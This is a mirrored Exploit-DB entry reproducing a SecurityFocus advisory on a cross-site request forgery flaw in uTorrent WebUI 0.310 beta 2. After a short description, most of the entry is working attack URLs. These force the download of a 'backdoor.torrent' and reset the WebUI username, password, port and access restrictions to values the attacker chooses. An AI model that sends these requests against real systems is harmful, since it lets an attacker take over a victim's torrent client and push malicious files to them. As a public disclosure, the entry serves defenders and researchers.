exploit-db-mirror/exploits/php/webapps/31672.txt
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

15 lines
No EOL
822 B
Text

source: http://www.securityfocus.com/bid/28847/info
uTorrent WebUI is prone to a cross-site request-forgery vulnerability.
Exploiting this issue may allow a remote attacker to execute arbitrary actions in the context of the affected application.
uTorrent WebUI 0.310 beta 2 is vulnerable; other versions may also be affected.
To force a file download:
http://www.example.com:8080/gui/?action=add-url&s=http://localhost/backdoor.torrent
To change administrative credentials and settings:
http://www.example.com:8080/gui/?action=setsetting&s=webui.username&v=badmin
http://www.example.com:8080/gui/?action=setsetting&s=webui.password&v=badmin
http://www.example.com:8080/gui/?action=setsetting&s=webui.port&v=4096 http://www.example.com:8080/gui/?action=setsetting&s=webui.restrict&v=127.0.0.1/24,10.1.1.1